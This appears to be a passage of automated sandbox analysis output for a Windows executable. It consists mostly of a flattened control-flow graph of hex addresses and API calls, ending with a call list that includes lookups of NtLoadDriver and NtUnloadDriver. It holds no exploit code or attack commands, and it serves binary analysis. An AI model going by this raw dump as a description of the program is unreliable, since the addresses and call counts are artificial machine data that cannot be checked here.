37820->37815 37821->37820 37822 415b79 memcpy 37821->37822 37822->37820 37824 4438d0 37823->37824 37834 4438c9 37823->37834 37837 415378 memcpy memcpy 37824->37837 37834->37820 40009 441b3f 40019 43a9f6 40009->40019 40011 441b61 40192 4386af memset 40011->40192 40013 44189a 40014 442bd4 40013->40014 40015 4418e2 40013->40015 40016 4418ea 40014->40016 40194 441409 memset 40014->40194 40015->40016 40193 4414a9 12 API calls 40015->40193 40020 43aa20 40019->40020 40021 43aadf 40019->40021 40020->40021 40022 43aa34 memset 40020->40022 40021->40011 40023 43aa56 40022->40023 40024 43aa4d 40022->40024 40195 43a6e7 40023->40195 40203 42c02e memset 40024->40203 40029 43aad3 40205 4169a7 11 API calls 40029->40205 40030 43aaae 40030->40021 40030->40029 40045 43aae5 40030->40045 40032 43ac18 40034 43ac47 40032->40034 40207 42bbd5 memcpy memcpy memcpy memset memcpy 40032->40207 40035 43aca8 40034->40035 40208 438eed 16 API calls 40034->40208 40039 43acd5 40035->40039 40210 4233ae 11 API calls 40035->40210 40038 43ac87 40209 4233c5 16 API calls 40038->40209 40211 423426 11 API calls 40039->40211 40043 43ace1 40212 439811 164 API calls 40043->40212 40044 43a9f6 162 API calls 40044->40045 40045->40021 40045->40032 40045->40044 40206 439bbb 22 API calls 40045->40206 40047 43acfd 40053 43ad2c 40047->40053 40213 438eed 16 API calls 40047->40213 40049 43ad19 40214 4233c5 16 API calls 40049->40214 40051 43ad58 40215 44081d 164 API calls 40051->40215 40053->40051 40055 43add9 40053->40055 40055->40055 40219 423426 11 API calls 40055->40219 40056 43ae3a memset 40057 43ae73 40056->40057 40220 42e1c0 148 API calls 40057->40220 40058 43adab 40217 438c4e 164 API calls 40058->40217 40060 43ad6c 40060->40021 40060->40058 40216 42370b memset memcpy memset 40060->40216 40062 43ae96 40221 42e1c0 148 API calls 40062->40221 40064 43adcc 40218 440f84 12 API calls 40064->40218 40067 43aea8 40068 43aec1 40067->40068 40222 42e199 148 API calls 40067->40222 40070 43af00 40068->40070 40223 42e1c0 148 API 
calls 40068->40223 40070->40021 40073 43af1a 40070->40073 40074 43b3d9 40070->40074 40224 438eed 16 API calls 40073->40224 40079 43b3f6 40074->40079 40086 43b4c8 40074->40086 40076 43b60f 40076->40021 40283 4393a5 17 API calls 40076->40283 40077 43af2f 40225 4233c5 16 API calls 40077->40225 40265 432878 12 API calls 40079->40265 40081 43af51 40226 423426 11 API calls 40081->40226 40084 43af7d 40227 423426 11 API calls 40084->40227 40085 43b4f2 40272 43a76c 21 API calls 40085->40272 40086->40085 40271 42bbd5 memcpy memcpy memcpy memset memcpy 40086->40271 40090 43b529 40273 44081d 164 API calls 40090->40273 40091 43b428 40119 43b462 40091->40119 40266 432b60 16 API calls 40091->40266 40092 43af94 40228 423330 11 API calls 40092->40228 40096 43b47e 40105 43b497 40096->40105 40268 42374a memcpy memset memcpy memcpy memcpy 40096->40268 40097 43b544 40107 43b55c 40097->40107 40274 42c02e memset 40097->40274 40098 43afca 40229 423330 11 API calls 40098->40229 40103 43afdb 40230 4233ae 11 API calls 40103->40230 40269 4233ae 11 API calls 40105->40269 40106 43b4b1 40270 423399 11 API calls 40106->40270 40275 43a87a 164 API calls 40107->40275 40109 43b56c 40112 43b58a 40109->40112 40276 423330 11 API calls 40109->40276 40111 43afee 40231 44081d 164 API calls 40111->40231 40277 440f84 12 API calls 40112->40277 40114 43b4c1 40279 42db80 164 API calls 40114->40279 40118 43b592 40278 43a82f 16 API calls 40118->40278 40267 423330 11 API calls 40119->40267 40122 43b5b4 40280 438c4e 164 API calls 40122->40280 40124 43b5cf 40281 42c02e memset 40124->40281 40126 43b005 40126->40021 40131 43b01f 40126->40131 40232 42d836 164 API calls 40126->40232 40127 43b1ef 40242 4233c5 16 API calls 40127->40242 40129 43b212 40243 423330 11 API calls 40129->40243 40131->40127 40240 423330 11 API calls 40131->40240 40241 42d71d 164 API calls 40131->40241 40133 43add4 40133->40076 40282 438f86 16 API calls 40133->40282 40136 43b087 40233 4233ae 11 API calls 40136->40233 40137 43b22a 40244 42ccb5 11 
API calls 40137->40244 40140 43b10f 40236 423330 11 API calls 40140->40236 40141 43b23f 40245 4233ae 11 API calls 40141->40245 40143 43b257 40246 4233ae 11 API calls 40143->40246 40147 43b129 40237 4233ae 11 API calls 40147->40237 40148 43b26e 40247 4233ae 11 API calls 40148->40247 40150 43b09a 40150->40140 40234 42cc15 19 API calls 40150->40234 40235 4233ae 11 API calls 40150->40235 40152 43b282 40248 43a87a 164 API calls 40152->40248 40154 43b13c 40238 440f84 12 API calls 40154->40238 40156 43b29d 40249 423330 11 API calls 40156->40249 40159 43b15f 40239 4233ae 11 API calls 40159->40239 40160 43b2af 40162 43b2b8 40160->40162 40163 43b2ce 40160->40163 40250 4233ae 11 API calls 40162->40250 40251 440f84 12 API calls 40163->40251 40166 43b2c9 40253 4233ae 11 API calls 40166->40253 40167 43b2da 40252 42370b memset memcpy memset 40167->40252 40170 43b2f9 40254 423330 11 API calls 40170->40254 40172 43b30b 40255 423330 11 API calls 40172->40255 40174 43b325 40256 423399 11 API calls 40174->40256 40176 43b332 40257 4233ae 11 API calls 40176->40257 40178 43b354 40258 423399 11 API calls 40178->40258 40180 43b364 40259 43a82f 16 API calls 40180->40259 40182 43b370 40260 42db80 164 API calls 40182->40260 40184 43b380 40261 438c4e 164 API calls 40184->40261 40186 43b39e 40262 423399 11 API calls 40186->40262 40188 43b3ae 40263 43a76c 21 API calls 40188->40263 40190 43b3c3 40264 423399 11 API calls 40190->40264 40192->40013 40193->40016 40194->40014 40196 43a6f5 40195->40196 40197 43a765 40195->40197 40196->40197 40284 42a115 40196->40284 40197->40021 40204 4397fd memset 40197->40204 40201 43a73d 40201->40197 40202 42a115 148 API calls 40201->40202 40202->40197 40203->40023 40204->40030 40205->40021 40206->40045 40207->40034 40208->40038 40209->40035 40210->40039 40211->40043 40212->40047 40213->40049 40214->40053 40215->40060 40216->40058 40217->40064 40218->40133 40219->40056 40220->40062 40221->40067 40222->40068 40223->40068 40224->40077 40225->40081 40226->40084 
40227->40092 40228->40098 40229->40103 40230->40111 40231->40126 40232->40136 40233->40150 40234->40150 40235->40150 40236->40147 40237->40154 40238->40159 40239->40131 40240->40131 40241->40131 40242->40129 40243->40137 40244->40141 40245->40143 40246->40148 40247->40152 40248->40156 40249->40160 40250->40166 40251->40167 40252->40166 40253->40170 40254->40172 40255->40174 40256->40176 40257->40178 40258->40180 40259->40182 40260->40184 40261->40186 40262->40188 40263->40190 40264->40133 40265->40091 40266->40119 40267->40096 40268->40105 40269->40106 40270->40114 40271->40085 40272->40090 40273->40097 40274->40107 40275->40109 40276->40112 40277->40118 40278->40114 40279->40122 40280->40124 40281->40133 40282->40076 40283->40021 40285 42a175 40284->40285 40287 42a122 40284->40287 40285->40197 40290 42b13b 148 API calls 40285->40290 40287->40285 40288 42a115 148 API calls 40287->40288 40291 43a174 40287->40291 40315 42a0a8 148 API calls 40287->40315 40288->40287 40290->40201 40305 43a196 40291->40305 40306 43a19e 40291->40306 40292 43a306 40292->40305 40331 4388c4 14 API calls 40292->40331 40295 42a115 148 API calls 40295->40306 40296 415a91 memset 40296->40306 40297 43a642 40297->40305 40335 4169a7 11 API calls 40297->40335 40301 43a635 40334 42c02e memset 40301->40334 40305->40287 40306->40292 40306->40295 40306->40296 40306->40305 40316 42ff8c 40306->40316 40324 4165ff 40306->40324 40327 439504 13 API calls 40306->40327 40328 4312d0 148 API calls 40306->40328 40329 42be4c memcpy memcpy memcpy memset memcpy 40306->40329 40330 43a121 11 API calls 40306->40330 40308 43a325 40308->40297 40308->40301 40308->40305 40309 4169a7 11 API calls 40308->40309 40310 42b5b5 memset memcpy 40308->40310 40311 42bf4c 14 API calls 40308->40311 40314 4165ff 11 API calls 40308->40314 40332 42b63e 14 API calls 40308->40332 40333 42bfcf memcpy 40308->40333 40309->40308 40310->40308 40311->40308 40314->40308 40315->40287 40336 43817e 40316->40336 40318 42ff99 40319 42ffe3 40318->40319 
40320 42ffd0 40318->40320 40323 42ff9d 40318->40323 40341 4169a7 11 API calls 40319->40341 40340 4169a7 11 API calls 40320->40340 40323->40306 40325 4165a0 11 API calls 40324->40325 40326 41660d 40325->40326 40326->40306 40327->40306 40328->40306 40329->40306 40330->40306 40331->40308 40332->40308 40333->40308 40334->40297 40335->40305 40337 438187 40336->40337 40339 438192 40336->40339 40342 4380f6 40337->40342 40339->40318 40340->40323 40341->40323 40344 43811f 40342->40344 40343 438164 40343->40339 40344->40343 40346 4300e8 3 API calls 40344->40346 40347 437e5e 40344->40347 40346->40344 40370 437d3c 40347->40370 40349 437eb3 40349->40344 40350 437ea9 40350->40349 40355 437f22 40350->40355 40385 41f432 40350->40385 40353 437f06 40433 415c56 11 API calls 40353->40433 40357 437f7f 40355->40357 40358 432d4e 3 API calls 40355->40358 40356 437f95 40434 415c56 11 API calls 40356->40434 40357->40356 40360 43802b 40357->40360 40358->40357 40361 4165ff 11 API calls 40360->40361 40362 438054 40361->40362 40396 437371 40362->40396 40365 43806b 40366 438094 40365->40366 40435 42f50e 139 API calls 40365->40435 40368 437fa3 40366->40368 40369 4300e8 3 API calls 40366->40369 40368->40349 40436 41f638 104 API calls 40368->40436 40369->40368 40371 437d69 40370->40371 40374 437d80 40370->40374 40437 437ccb 11 API calls 40371->40437 40373 437d76 40373->40350 40374->40373 40375 437da3 40374->40375 40376 437d90 40374->40376 40378 438460 134 API calls 40375->40378 40376->40373 40441 437ccb 11 API calls 40376->40441 40381 437dcb 40378->40381 40380 437de8 40440 424f26 123 API calls 40380->40440 40381->40380 40438 444283 13 API calls 40381->40438 40383 437dfc 40439 437ccb 11 API calls 40383->40439 40386 41f54d 40385->40386 40392 41f44f 40385->40392 40387 41f466 40386->40387 40471 41c635 memset memset 40386->40471 40387->40353 40387->40355 40392->40387 40394 41f50b 40392->40394 40442 41f1a5 40392->40442 40467 41c06f memcmp 40392->40467 40468 41f3b1 90 API calls 40392->40468 40469 41f398 
86 API calls 40392->40469 40394->40386 40394->40387 40470 41c295 86 API calls 40394->40470 40397 41703f 11 API calls 40396->40397 40398 437399 40397->40398 40399 43739d 40398->40399 40402 4373ac 40398->40402 40473 4446ea 11 API calls 40399->40473 40401 4373a7 40401->40365 40403 416935 16 API calls 40402->40403 40404 4373ca 40403->40404 40406 438460 134 API calls 40404->40406 40410 4251c4 137 API calls 40404->40410 40414 415a91 memset 40404->40414 40417 43758f 40404->40417 40429 437584 40404->40429 40432 437d3c 135 API calls 40404->40432 40472 415308 free 40404->40472 40474 425433 13 API calls 40404->40474 40475 425413 17 API calls 40404->40475 40476 42533e 16 API calls 40404->40476 40477 42538f 16 API calls 40404->40477 40478 42453e 123 API calls 40404->40478 40405 4375bc 40408 415c7d 16 API calls 40405->40408 40406->40404 40409 4375d2 40408->40409 40409->40401 40411 4442e6 11 API calls 40409->40411 40410->40404 40412 4375e2 40411->40412 40412->40401 40481 444283 13 API calls 40412->40481 40414->40404 40479 42453e 123 API calls 40417->40479 40418 4375f4 40423 437620 40418->40423 40424 43760b 40418->40424 40422 43759f 40425 416935 16 API calls 40422->40425 40427 416935 16 API calls 40423->40427 40482 444283 13 API calls 40424->40482 40425->40429 40427->40401 40429->40405 40480 42453e 123 API calls 40429->40480 40430 437612 memcpy 40430->40401 40432->40404 40433->40349 40434->40368 40435->40366 40436->40349 40437->40373 40438->40383 40439->40380 40440->40373 40441->40373 40443 41bc3b 101 API calls 40442->40443 40444 41f1b4 40443->40444 40445 41edad 86 API calls 40444->40445 40452 41f282 40444->40452 40446 41f1cb 40445->40446 40447 41f1f5 memcmp 40446->40447 40448 41f20e 40446->40448 40446->40452 40447->40448 40449 41f21b memcmp 40448->40449 40448->40452 40450 41f326 40449->40450 40453 41f23d 40449->40453 40451 41ee6b 86 API calls 40450->40451 40450->40452 40451->40452 40452->40392 40453->40450 40454 41f28e memcmp 40453->40454 40456 41c8df 56 API calls 40453->40456 
40454->40450 40455 41f2a9 40454->40455 40455->40450 40458 41f308 40455->40458 40459 41f2d8 40455->40459 40457 41f269 40456->40457 40457->40450 40460 41f287 40457->40460 40461 41f27a 40457->40461 40458->40450 40465 4446ce 11 API calls 40458->40465 40462 41ee6b 86 API calls 40459->40462 40460->40454 40463 41ee6b 86 API calls 40461->40463 40464 41f2e0 40462->40464 40463->40452 40466 41b1ca memset 40464->40466 40465->40450 40466->40452 40467->40392 40468->40392 40469->40392 40470->40386 40471->40387 40472->40404 40473->40401 40474->40404 40475->40404 40476->40404 40477->40404 40478->40404 40479->40422 40480->40405 40481->40418 40482->40430 37838 41276d 37839 41277d 37838->37839 37881 4044a4 LoadLibraryW 37839->37881 37841 412785 37842 412789 37841->37842 37889 414b81 37841->37889 37845 4127c8 37895 412465 memset ??2@YAPAXI 37845->37895 37847 4127ea 37907 40ac21 37847->37907 37852 412813 37925 40dd07 memset 37852->37925 37853 412827 37930 40db69 memset 37853->37930 37856 412822 37951 4125b6 ??3@YAXPAX 37856->37951 37858 40ada2 _wcsicmp 37860 41283d 37858->37860 37860->37856 37863 412863 CoInitialize 37860->37863 37935 41268e 37860->37935 37955 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37863->37955 37866 41296f 37957 40b633 37866->37957 37868 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37873 412957 CoUninitialize 37868->37873 37878 4128ca 37868->37878 37873->37856 37874 4128d0 TranslateAcceleratorW 37875 412941 GetMessageW 37874->37875 37874->37878 37875->37873 37875->37874 37876 412909 IsDialogMessageW 37876->37875 37876->37878 37877 4128fd IsDialogMessageW 37877->37875 37877->37876 37878->37874 37878->37876 37878->37877 37879 41292b TranslateMessage DispatchMessageW 37878->37879 37880 41291f IsDialogMessageW 37878->37880 37879->37875 37880->37875 37880->37879 37882 4044f7 37881->37882 37883 4044cf GetProcAddress 37881->37883 37887 404507 MessageBoxW 37882->37887 37888 40451e 37882->37888 37884 4044e8 
FreeLibrary 37883->37884 37885 4044df 37883->37885 37884->37882 37886 4044f3 37884->37886 37885->37884 37886->37882 37887->37841 37888->37841 37890 414b8a 37889->37890 37891 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37889->37891 37961 40a804 memset 37890->37961 37891->37845 37894 414b9e GetProcAddress 37894->37891 37896 4124e0 37895->37896 37897 412505 ??2@YAPAXI 37896->37897 37898 412521 37897->37898 37899 41251c 37897->37899 37972 444722 37898->37972 37983 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37899->37983 37906 41259b wcscpy 37906->37847 37988 40b1ab free free 37907->37988 37909 40ad76 37989 40aa04 37909->37989 37912 40a9ce malloc memcpy free free 37915 40ac5c 37912->37915 37913 40ad4b 37913->37909 38012 40a9ce 37913->38012 37915->37909 37915->37912 37915->37913 37916 40ace7 free 37915->37916 37992 40a8d0 37915->37992 38004 4099f4 37915->38004 37916->37915 37920 40a8d0 7 API calls 37920->37909 37921 40ada2 37922 40adc9 37921->37922 37923 40adaa 37921->37923 37922->37852 37922->37853 37923->37922 37924 40adb3 _wcsicmp 37923->37924 37924->37922 37924->37923 38017 40dce0 37925->38017 37927 40dd3a GetModuleHandleW 38022 40dba7 37927->38022 37931 40dce0 3 API calls 37930->37931 37932 40db99 37931->37932 38094 40dae1 37932->38094 38108 402f3a 37935->38108 37937 412766 37937->37856 37937->37863 37938 4126d3 _wcsicmp 37939 4126a8 37938->37939 37939->37937 37939->37938 37941 41270a 37939->37941 38143 4125f8 7 API calls 37939->38143 37941->37937 38111 411ac5 37941->38111 37952 4125da 37951->37952 37953 4125f0 37952->37953 37954 4125e6 DeleteObject 37952->37954 37956 40b1ab free free 37953->37956 37954->37953 37955->37868 37956->37866 37958 40b640 37957->37958 37959 40b639 free 37957->37959 37960 40b1ab free free 37958->37960 37959->37958 37960->37842 37962 40a83b GetSystemDirectoryW 37961->37962 37963 40a84c wcscpy 37961->37963 37962->37963 37968 409719 wcslen 37963->37968 37966 40a881 LoadLibraryW 37967 40a886 37966->37967 37967->37891 
37967->37894 37969 409724 37968->37969 37970 409739 wcscat LoadLibraryW 37968->37970 37969->37970 37971 40972c wcscat 37969->37971 37970->37966 37970->37967 37971->37970 37973 444732 37972->37973 37974 444728 DeleteObject 37972->37974 37984 409cc3 37973->37984 37974->37973 37976 412551 37977 4010f9 37976->37977 37978 401130 37977->37978 37979 401134 GetModuleHandleW LoadIconW 37978->37979 37980 401107 wcsncat 37978->37980 37981 40a7be 37979->37981 37980->37978 37982 40a7d2 37981->37982 37982->37906 37982->37982 37983->37898 37987 409bfd memset wcscpy 37984->37987 37986 409cdb CreateFontIndirectW 37986->37976 37987->37986 37988->37915 37990 40aa14 37989->37990 37991 40aa0a free 37989->37991 37990->37921 37991->37990 37993 40a8eb 37992->37993 37994 40a8df wcslen 37992->37994 37995 40a906 free 37993->37995 37996 40a90f 37993->37996 37994->37993 37997 40a919 37995->37997 37998 4099f4 3 API calls 37996->37998 37999 40a932 37997->37999 38000 40a929 free 37997->38000 37998->37997 38002 4099f4 3 API calls 37999->38002 38001 40a93e memcpy 38000->38001 38001->37915 38003 40a93d 38002->38003 38003->38001 38005 409a41 38004->38005 38006 4099fb malloc 38004->38006 38005->37915 38008 409a37 38006->38008 38009 409a1c 38006->38009 38008->37915 38010 409a30 free 38009->38010 38011 409a20 memcpy 38009->38011 38010->38008 38011->38010 38013 40a9e7 38012->38013 38014 40a9dc free 38012->38014 38015 4099f4 3 API calls 38013->38015 38016 40a9f2 38014->38016 38015->38016 38016->37920 38041 409bca GetModuleFileNameW 38017->38041 38019 40dce6 wcsrchr 38020 40dcf5 38019->38020 38021 40dcf9 wcscat 38019->38021 38020->38021 38021->37927 38042 44db70 38022->38042 38024 40dbb4 memset memset 38044 409bca GetModuleFileNameW 38024->38044 38026 40dbfd 38045 4447d9 38026->38045 38029 40dc34 wcscpy wcscpy 38071 40d6f5 38029->38071 38030 40dc1f wcscpy 38030->38029 38033 40d6f5 3 API calls 38034 40dc73 38033->38034 38035 40d6f5 3 API calls 38034->38035 38036 40dc89 38035->38036 38037 40d6f5 3 API calls 
38036->38037 38038 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38037->38038 38077 40da80 38038->38077 38041->38019 38043 44db77 38042->38043 38043->38024 38043->38043 38044->38026 38047 4447f4 38045->38047 38046 40dc1b 38046->38029 38046->38030 38047->38046 38048 444807 ??2@YAPAXI 38047->38048 38049 44481f 38048->38049 38050 444873 _snwprintf 38049->38050 38051 4448ab wcscpy 38049->38051 38084 44474a 8 API calls 38050->38084 38053 4448bb 38051->38053 38085 44474a 8 API calls 38053->38085 38054 4448a7 38054->38051 38054->38053 38056 4448cd 38086 44474a 8 API calls 38056->38086 38058 4448e2 38087 44474a 8 API calls 38058->38087 38060 4448f7 38088 44474a 8 API calls 38060->38088 38062 44490c 38089 44474a 8 API calls 38062->38089 38064 444921 38090 44474a 8 API calls 38064->38090 38066 444936 38091 44474a 8 API calls 38066->38091 38068 44494b 38092 44474a 8 API calls 38068->38092 38070 444960 ??3@YAXPAX 38070->38046 38072 44db70 38071->38072 38073 40d702 memset GetPrivateProfileStringW 38072->38073 38074 40d752 38073->38074 38075 40d75c WritePrivateProfileStringW 38073->38075 38074->38075 38076 40d758 38074->38076 38075->38076 38076->38033 38078 44db70 38077->38078 38079 40da8d memset 38078->38079 38080 40daac LoadStringW 38079->38080 38083 40dac6 38080->38083 38082 40dade 38082->37856 38083->38080 38083->38082 38093 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38083->38093 38084->38054 38085->38056 38086->38058 38087->38060 38088->38062 38089->38064 38090->38066 38091->38068 38092->38070 38093->38083 38104 409b98 GetFileAttributesW 38094->38104 38096 40daea 38097 40daef wcscpy wcscpy GetPrivateProfileIntW 38096->38097 38103 40db63 38096->38103 38105 40d65d GetPrivateProfileStringW 38097->38105 38099 40db3e 38106 40d65d GetPrivateProfileStringW 38099->38106 38101 40db4f 38107 40d65d GetPrivateProfileStringW 38101->38107 38103->37858 38104->38096 38105->38099 38106->38101 38107->38103 38144 40eaff 38108->38144 38112 411ae2 
memset 38111->38112 38113 411b8f 38111->38113 38184 409bca GetModuleFileNameW 38112->38184 38125 411a8b 38113->38125 38115 411b0a wcsrchr 38116 411b22 wcscat 38115->38116 38117 411b1f 38115->38117 38185 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38116->38185 38117->38116 38119 411b67 38186 402afb 38119->38186 38123 411b7f 38242 40ea13 SendMessageW memset SendMessageW 38123->38242 38126 402afb 27 API calls 38125->38126 38127 411ac0 38126->38127 38128 4110dc 38127->38128 38129 41113e 38128->38129 38134 4110f0 38128->38134 38267 40969c LoadCursorW SetCursor 38129->38267 38131 411143 38268 444a54 38131->38268 38271 4032b4 38131->38271 38289 40b1ab free free 38131->38289 38132 4110f7 _wcsicmp 38132->38134 38133 411157 38135 40ada2 _wcsicmp 38133->38135 38134->38129 38134->38132 38290 410c46 10 API calls 38134->38290 38138 411167 38135->38138 38136 4111af 38138->38136 38139 4111a6 qsort 38138->38139 38139->38136 38143->37939 38145 40eb10 38144->38145 38157 40e8e0 38145->38157 38148 40eb6c memcpy memcpy 38149 40ebb7 38148->38149 38149->38148 38150 40ebf2 ??2@YAPAXI ??2@YAPAXI 38149->38150 38153 40d134 16 API calls 38149->38153 38151 40ec2e ??2@YAPAXI 38150->38151 38152 40ec65 38150->38152 38151->38152 38167 40ea7f 38152->38167 38153->38149 38156 402f49 38156->37939 38158 40e8f2 38157->38158 38159 40e8eb ??3@YAXPAX 38157->38159 38160 40e900 38158->38160 38161 40e8f9 ??3@YAXPAX 38158->38161 38159->38158 38162 40e911 38160->38162 38163 40e90a ??3@YAXPAX 38160->38163 38161->38160 38164 40e931 ??2@YAPAXI ??2@YAPAXI 38162->38164 38165 40e921 ??3@YAXPAX 38162->38165 38166 40e92a ??3@YAXPAX 38162->38166 38163->38162 38164->38148 38165->38166 38166->38164 38168 40aa04 free 38167->38168 38169 40ea88 38168->38169 38170 40aa04 free 38169->38170 38171 40ea90 38170->38171 38172 40aa04 free 38171->38172 38173 40ea98 38172->38173 38174 40aa04 free 38173->38174 38175 40eaa0 38174->38175 38176 40a9ce 4 API calls 38175->38176 38177 40eab3 38176->38177 38178 40a9ce 4 API calls 
38177->38178 38179 40eabd 38178->38179 38180 40a9ce 4 API calls 38179->38180 38181 40eac7 38180->38181 38182 40a9ce 4 API calls 38181->38182 38183 40ead1 38182->38183 38183->38156 38184->38115 38185->38119 38243 40b2cc 38186->38243 38188 402b0a 38189 40b2cc 27 API calls 38188->38189 38190 402b23 38189->38190 38191 40b2cc 27 API calls 38190->38191 38192 402b3a 38191->38192 38193 40b2cc 27 API calls 38192->38193 38194 402b54 38193->38194 38195 40b2cc 27 API calls 38194->38195 38196 402b6b 38195->38196 38197 40b2cc 27 API calls 38196->38197 38198 402b82 38197->38198 38199 40b2cc 27 API calls 38198->38199 38200 402b99 38199->38200 38201 40b2cc 27 API calls 38200->38201 38202 402bb0 38201->38202 38203 40b2cc 27 API calls 38202->38203 38204 402bc7 38203->38204 38205 40b2cc 27 API calls 38204->38205 38206 402bde 38205->38206 38207 40b2cc 27 API calls 38206->38207 38208 402bf5 38207->38208 38209 40b2cc 27 API calls 38208->38209 38210 402c0c 38209->38210 38211 40b2cc 27 API calls 38210->38211 38212 402c23 38211->38212 38213 40b2cc 27 API calls 38212->38213 38214 402c3a 38213->38214 38215 40b2cc 27 API calls 38214->38215 38216 402c51 38215->38216 38217 40b2cc 27 API calls 38216->38217 38218 402c68 38217->38218 38219 40b2cc 27 API calls 38218->38219 38220 402c7f 38219->38220 38221 40b2cc 27 API calls 38220->38221 38222 402c99 38221->38222 38223 40b2cc 27 API calls 38222->38223 38224 402cb3 38223->38224 38225 40b2cc 27 API calls 38224->38225 38226 402cd5 38225->38226 38227 40b2cc 27 API calls 38226->38227 38228 402cf0 38227->38228 38229 40b2cc 27 API calls 38228->38229 38230 402d0b 38229->38230 38231 40b2cc 27 API calls 38230->38231 38232 402d26 38231->38232 38233 40b2cc 27 API calls 38232->38233 38234 402d3e 38233->38234 38235 40b2cc 27 API calls 38234->38235 38236 402d59 38235->38236 38237 40b2cc 27 API calls 38236->38237 38238 402d78 38237->38238 38239 40b2cc 27 API calls 38238->38239 38240 402d93 38239->38240 38241 4018db GetWindowPlacement memset GetSystemMetrics 
GetSystemMetrics SetWindowPlacement 38240->38241 38241->38123 38242->38113 38246 40b58d 38243->38246 38245 40b2d1 38245->38188 38247 40b5a4 GetModuleHandleW FindResourceW 38246->38247 38248 40b62e 38246->38248 38249 40b5c2 LoadResource 38247->38249 38251 40b5e7 38247->38251 38248->38245 38250 40b5d0 SizeofResource LockResource 38249->38250 38249->38251 38250->38251 38251->38248 38259 40afcf 38251->38259 38253 40b608 memcpy 38262 40b4d3 memcpy 38253->38262 38255 40b61e 38263 40b3c1 18 API calls 38255->38263 38257 40b626 38264 40b04b 38257->38264 38260 40b04b ??3@YAXPAX 38259->38260 38261 40afd7 ??2@YAPAXI 38260->38261 38261->38253 38262->38255 38263->38257 38265 40b051 ??3@YAXPAX 38264->38265 38266 40b05f 38264->38266 38265->38266 38266->38248 38267->38131 38269 444a64 FreeLibrary 38268->38269 38270 444a83 38268->38270 38269->38270 38270->38133 38272 4032c4 38271->38272 38273 40b633 free 38272->38273 38274 403316 38273->38274 38291 44553b 38274->38291 38278 403480 38489 40368c 15 API calls 38278->38489 38280 403489 38281 40b633 free 38280->38281 38283 403495 38281->38283 38282 40333c 38282->38278 38284 4033a9 memset memcpy 38282->38284 38285 4033ec wcscmp 38282->38285 38487 4028e7 11 API calls 38282->38487 38488 40f508 6 API calls 38282->38488 38283->38133 38284->38282 38284->38285 38285->38282 38288 403421 _wcsicmp 38288->38282 38289->38133 38290->38134 38292 445548 38291->38292 38293 445599 38292->38293 38490 40c768 38292->38490 38294 4455a8 memset 38293->38294 38301 4457f2 38293->38301 38574 403988 38294->38574 38304 445854 38301->38304 38676 403e2d memset memset memset memset memset 38301->38676 38302 4455e5 38313 445672 38302->38313 38318 44560f 38302->38318 38303 4458bb memset memset 38306 414c2e 17 API calls 38303->38306 38357 4458aa 38304->38357 38699 403c9c memset memset memset memset memset 38304->38699 38309 4458f9 38306->38309 38308 44595e memset memset 38316 414c2e 17 API calls 38308->38316 38317 40b2cc 27 API calls 38309->38317 38311 44558c 38558 
444b06 38311->38558 38312 44557a 38312->38311 38772 4136c0 CoTaskMemFree 38312->38772 38585 403fbe memset memset memset memset memset 38313->38585 38314 445a00 memset memset 38722 414c2e 38314->38722 38315 445b22 38321 445bca 38315->38321 38322 445b38 memset memset memset 38315->38322 38326 44599c 38316->38326 38328 445909 38317->38328 38330 4087b3 338 API calls 38318->38330 38320 445849 38788 40b1ab free free 38320->38788 38329 445c8b memset memset 38321->38329 38395 445cf0 38321->38395 38333 445bd4 38322->38333 38334 445b98 38322->38334 38327 40b2cc 27 API calls 38326->38327 38341 4459ac 38327->38341 38338 409d1f 6 API calls 38328->38338 38342 414c2e 17 API calls 38329->38342 38339 445621 38330->38339 38331 44589f 38789 40b1ab free free 38331->38789 38332 445585 38773 41366b FreeLibrary 38332->38773 38348 414c2e 17 API calls 38333->38348 38334->38333 38344 445ba2 38334->38344 38337 403335 38486 4452e5 45 API calls 38337->38486 38352 445919 38338->38352 38774 4454bf 20 API calls 38339->38774 38340 445823 38340->38320 38362 4087b3 338 API calls 38340->38362 38353 409d1f 6 API calls 38341->38353 38354 445cc9 38342->38354 38861 4099c6 wcslen 38344->38861 38345 4456b2 38776 40b1ab free free 38345->38776 38347 40b2cc 27 API calls 38358 445a4f 38347->38358 38349 445be2 38348->38349 38360 40b2cc 27 API calls 38349->38360 38350 445d3d 38380 40b2cc 27 API calls 38350->38380 38351 445d88 memset memset memset 38363 414c2e 17 API calls 38351->38363 38790 409b98 GetFileAttributesW 38352->38790 38364 4459bc 38353->38364 38365 409d1f 6 API calls 38354->38365 38355 445879 38355->38331 38376 4087b3 338 API calls 38355->38376 38357->38303 38381 44594a 38357->38381 38738 409d1f wcslen wcslen 38358->38738 38370 445bf3 38360->38370 38362->38340 38373 445dde 38363->38373 38857 409b98 GetFileAttributesW 38364->38857 38375 445ce1 38365->38375 38366 445bb3 38864 445403 memset 38366->38864 38367 445680 38367->38345 38608 4087b3 memset 38367->38608 38379 409d1f 6 API calls 38370->38379 

                                                                                                                  Control-flow Graph for the code at 40dd85 (legend: Executed / Not Executed)
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040DDAD
                                                                                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                    • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
